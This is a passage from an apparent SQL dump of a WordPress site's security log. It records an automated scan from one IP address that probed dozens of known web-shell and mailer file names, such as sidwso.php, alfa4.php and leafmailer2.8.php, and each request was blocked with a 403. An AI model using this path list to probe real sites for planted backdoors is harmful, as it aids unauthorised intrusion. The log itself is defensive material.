1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/programa_apoyo_editoriales.php\"}','5MEDtJhAsgZy6Bl3UpLRSvKo',0,1674345600.6255,98,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/revision-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/revision-meta.php\"}','kzpqMLE9XilnZaOQexhWSPgc',0,1674345600.8931,120,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/revo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/revo.php\"}','xoYOr5feqv8XLEJhSMwkHNgP',0,1674345601.1802,262,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/RxR_iblkjmoy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/RxR_iblkjmoy.php\"}','ByWThaJEerYpNdcbx35HSRPU',0,1674345601.6577,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/safeparam-doctype.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/safeparam-doctype.php\"}','D4Izq1WG5ETVM7pgFQXsZbwJ',0,1674345602.0289,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/seo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/seo.php\"}','jLJS6YGhgCa2W8dsMiv5QEPm',0,1674345602.4783,226,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/settings.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/settings.php\"}','oliRIC9xPdyStqcG8JM6VLmk',0,1674345603.1004,223,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/shell20211028.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/shell20211028.php.suspected\"}','yPLIRmKObpz09xQvtjA37WcM',0,1674345603.5970,426,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/sidwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/sidwso.php\"}','1Zz3mVdcyEqpMgG5bxKJvn6C',0,1674345604.2787,589,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/sk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/sk.php\"}','9nSJdsA243oZg1BmfxEvLODH',0,1674345605.2838,673,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/system.php\"}','uhAYknMJDPzoZqsEjgKmyrGe',0,1674345606.2821,218,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/tax2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/tax2.php\"}','gD4zkQiYPCwAcOFpTtB3S5UK',0,1674345606.7103,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/trio-kece.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/trio-kece.php\"}','5hMW97ZSDEjYxsVfJRlz1ed8',0,1674345607.2026,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/uplaod.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/uplaod.php\"}','nWoAfIaBU3wzk2dyQM4mXGcE',0,1674345607.5718,305,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/uploadzip.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/uploadzip.php\"}','qurAGhKUNgdvZmDQ3fyLoB2E',0,1674345608.0576,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/user-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/user-cron.php\"}','GwaiFLjyf2lUnXYSIN85deVO',0,1674345608.3903,103,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/users.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/users.php.suspected\"}','Mxhiz0Qq3VfvgW97XYt4pyDu',0,1674345608.6609,94,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/vjgtd8LW.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/vjgtd8LW.php\"}','lze1xT0fap42JLZcikw5BhMg',0,1674345609.0120,142,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-2019.php\"}','8CUB4m3vMS7I56XRthQdEFxg',0,1674345609.3311,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-class.php\"}','jF3ZovwIsUtL7PgJMxEhn8SW',0,1674345609.7116,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-gypqic.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-gypqic.php\"}','F53SfKxDbUz407NXJecEyChZ',0,1674345610.1104,99,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-includes/admin-bar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-includes\\/admin-bar.php\"}','2r7xuofBq8KlDHj9mnAviIQz',0,1674345610.4113,117,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-log.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-log.php\"}','b59H81Acsn0rFBwtVyT6SoG3',0,1674345610.7252,96,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-logs.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-logs.php\"}','KnDpoSx7iht62cqvBldOsZaW',0,1674345611.0698,152,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-mail.php\"}','gszcebh9TK1nw8OdZkQA7G3J',0,1674345611.4007,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wp-type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wp-type.php\"}','XeKs3H5Zr0zQmfn8wLjcv9PF',0,1674345611.7270,154,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wpspl-load-compat.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wpspl-load-compat.php\"}','F61ClwbaIES83eNJVZUyO7vK',0,1674345612.0783,125,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/wsoyanzorng.php\"}','DIN8PrnQgFZdibpYhyCq9Ul5',0,1674345612.3741,130,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/assets/alfa4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/assets\\/alfa4.php\"}','O6nAilHmj2soaSg9v1W3r40V',0,1674345612.6792,148,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/block-supports/layout-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/block-supports\\/layout-ajax-response.php\"}','vGjzZ8QwptRc4uiqg9WYVkLS',0,1674345612.9907,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/certificates/comments-popup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/certificates\\/comments-popup.php\"}','VrfjpBwx9ZCcvFRDegi3qGbU',0,1674345614.0625,267,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/certificates/image_type_to_mime_type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/certificates\\/image_type_to_mime_type.php\"}','o43SPh6aiA7LfpHZDwCj98kx',0,1674345614.4942,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/certificates/submenu-pspell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/certificates\\/submenu-pspell.php\"}','HNzRALaQ7uhkr5x2P8GWqYFi',0,1674345614.7763,138,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/certificates/wp-conflg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/certificates\\/wp-conflg.php\"}','gsrZuX578Ciq2F1KAeyESfnV',0,1674345615.1058,101,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/certificates/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/certificates\\/wp-signup.php\"}','h2bHVaoP8T0qw3xOnQgJDdUi',0,1674345615.3913,198,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/01%20copy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/01%20copy.php\"}','aXy1MxILi4YbqvGgUsSlRdEA',0,1674345615.7491,104,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/01589a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/01589a.php\"}','l6Mmy8ZI3OVJfTptYzQ1ciGL',0,1674345616.0374,101,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/88981.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/88981.php\"}','ClDkLmPRiIpcMBybWu0A3KVt',0,1674345616.3155,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/bimowdoodk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/bimowdoodk.php\"}','P1wJNeBK3Ej8n4XCZH2YrdMu',0,1674345616.6461,123,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/css-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/css-blog.php\"}','ZhRIlQHNzPD4AjqOF8x3Jvmp',0,1674345616.9357,98,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/mpv2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/mpv2.php\"}','NTxjYDuipHZtqU6CgOh7BJmL',0,1674345617.2594,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/str_replace.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/str_replace.php\"}','ERZqujGDL6Qz5lm9fBPNAbtg',0,1674345617.6374,127,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/customize/elbjewpi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/customize\\/elbjewpi.php\"}','ZFJSXph6eCQGaRIYilOzmg7d',0,1674345617.9270,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/customize/inpf8747384.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/customize\\/inpf8747384.php\"}','hTep53tIc0G8UfRZd9PJ2omb',0,1674345618.2661,201,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/fonts/setcookie.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/fonts\\/setcookie.php\"}','96Yg5NK3UQXV8wniEhJBf4yk',0,1674345618.6364,104,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/fonts/sqlite_pagebreak_adapter.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/fonts\\/sqlite_pagebreak_adapter.php\"}','ETvI2Z9mgJblrwFkDitdWO4C',0,1674345618.9141,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/l.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/l.php\"}','BXqE3k52pUwDdJ1zT0GFPlWa',0,1674345619.3403,266,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/license.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/license.php\"}','hkMnZXYv4GDuA9iEyabdQRBW',0,1674345619.9043,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/module.audio-video.riff-wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/module.audio-video.riff-wp.php\"}','R8TaZlfcQDk4AWM7wNeH5gVL',0,1674345620.2684,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/tablepress_controllers.php\"}','TN0tvdLuhWUmz8nIjYKf4xJ2',0,1674345620.5804,108,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/unzipper.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/unzipper.php\"}','MsSk6aEFlpgqNCmfdQ7PL0Gr',0,1674345620.8538,130,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/vp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/vp.php\"}','LKduTaHrJtkqRvcE9UZCbi48',0,1674345621.1611,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/ID3/wp-plugins.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/ID3\\/wp-plugins.php\"}','xTkbBHNK2hwEoGezmlCDVr57',0,1674345621.5485,100,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/images/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/images\\/acces.php\"}','MET8GwxzfkZ63seW1JbcXpmO',0,1674345621.8340,88,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/images/configure.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/images\\/configure.php\"}','CThiL76xZQuH4pXGe3NKOyf9',0,1674345622.0863,125,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/images/img911.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/images\\/img911.php\"}','fbKaQ0I4BUF2k76MsH59eixh',0,1674345622.4003,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/IXR/opt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/IXR\\/opt.php\"}','32YkGsBZhr8bKeEm7jxaOcWX',0,1674345622.7733,91,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/IXR/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/IXR\\/tablepress_controllers.php\"}','gSlu1EbMZnWcLU6j4aHBIpQF',0,1674345623.0301,110,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/js/auto.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/js\\/auto.php\"}','iWwkCc0arORfBzG6SAjU4m8Z',0,1674345623.3200,120,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/js/old.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/js\\/old.php\"}','58DIUMwr7lOHtWjV1pLbg3RP',0,1674345623.6258,88,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/js/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/js\\/system.php\"}','tOI6MGJ7NR0U21FaYhX5dquQ',0,1674345623.9040,144,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/247@abu.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/247@abu.php\"}','hjL9UR8FxqfHQgOdekC4ubBV',0,1674345624.2353,119,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/bak.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/bak.php\"}','Tpk8xLdniPf0O2WmjcE1HeKG',0,1674345624.5219,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','hsPaZHuArvd9gJ7O62DC4KYb',0,1674345624.8696,127,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/Oilmoney.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/Oilmoney.php\"}','SZsY1DPOz8lnrpCtAEUv4gko',0,1674345625.2137,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/tablepress_controllers.php\"}','E0lg6CuVYkb7mwo1qaQNf35O',0,1674345625.5847,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/treame.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/treame.php\"}','5gC0dmREw2NM6z81XKFTViaf',0,1674345625.9303,129,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/user-new.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/user-new.php\"}','XBDiTyrpq2SZWLxGfVk1Jvo9',0,1674345626.2243,205,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/wp-y4y54.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/wp-y4y54.php\"}','1zJpNSvb83KutHwnoRieX0ET',0,1674345626.6152,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/yellow.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/yellow.php\"}','pnQjTWVBvk2wZxMPYN1J40At',0,1674345626.9860,108,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/zlib.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/zlib.php\"}','ClVSdIxBb7MPsnT1Qrz8XaOh',0,1674345627.2775,266,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/random_compat/random_bytes_cyclone.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/random_compat\\/random_bytes_cyclone.php\"}','4bwKg9HCjQ6qGtSLloe23c1p',0,1674345627.7254,139,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/SimplePie/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/SimplePie\\/acces.php\"}','N9zbv0iqQt8ogax2sfF6CdVu',0,1674345628.0496,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/theme-compat/back-up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/theme-compat\\/back-up.php\"}','qCpLczZf8vYiXtGRUFuWEjKd',0,1674345628.4236,135,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/theme-compat/border.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/theme-compat\\/border.php\"}','9AD61dOVjEpBso47etJ2mlCf',0,1674345628.7381,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/theme-compat/ok.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/theme-compat\\/ok.php\"}','fJT6ejEMX4rFC1k9wunZR3Gs',0,1674345629.0964,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/.well-known/leafmailer2.8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/.well-known\\/\\/leafmailer2.8.php\"}','EPeUkMbmprH1NRCa0V73J5j2',0,1674345629.4437,103,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/.well-known\\/\\/mail.php\"}','WI2eczQFSh5VvjJq3wKbEZCm',0,1674345629.7311,154,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/files/x3dleaf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/files\\/\\/x3dleaf.php\"}','OIRoj7YWwBnHZ1ASuvCkgbQc',0,1674345630.0612,1181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/files/mailer.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/files\\/mailer.php\"}','l7mzXGuZPjNgw1aqFQisO4J3',0,1674345632.1347,389,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/.well-known/js.php/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/.well-known\\/\\/js.php\\/.well-known\\/\\/mail.php\"}','ta0iIVpekAHjD374BqQfYbNF',0,1674345632.7215,515,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/.well-known/dze.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/.well-known\\/dze.php\"}','P5pvBqYTLtsAahmlu8KwkeOc',0,1674345633.4341,278,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk